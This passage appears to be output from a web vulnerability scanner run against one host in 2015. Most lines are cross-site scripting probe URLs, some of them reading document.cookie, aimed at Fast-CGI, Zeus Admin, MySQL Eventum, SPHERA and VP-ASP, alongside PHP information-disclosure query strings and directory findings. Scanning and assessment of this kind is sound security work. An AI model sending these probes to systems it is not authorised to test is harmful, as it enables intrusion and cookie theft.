+ OSVDB-700: /fcgi-bin/echo.exe?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: /fcgi-bin/echo2.exe?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-19947: /apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script>: Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12607: /forgot_password.php?email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: /bugs/index.php?err=3&email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: /bugs/forgot_password.php?email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: /eventum/index.php?err=3&email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: /eventum/forgot_password.php?email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-2562: /login/sm_login_screen.php?error=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /login/sm_login_screen.php?uid=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /SPHERA/login/sm_login_screen.php?error=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /SPHERA/login/sm_login_screen.php?uid=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2921: /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert(‘test’)</script>: VP-ASP prior to 4.50 are vulnerable to XSS attacks
+ OSVDB-2921: /shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>: VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.
+ OSVDB-3092: /info/: This might be interesting…
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting…
+ OSVDB-3092: /php/: This might be interesting…
+ OSVDB-3092: /stat/: This might be interesting…
+ OSVDB-3092: /statistics/: This might be interesting…
+ OSVDB-3092: /updates/: This might be interesting…
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 4 error(s) and 167 item(s) reported on remote host
+ End Time: 2015-11-23 13:43:14 (GMT7) (3366 seconds)
—————————————————————————
+ 1 host(s) tested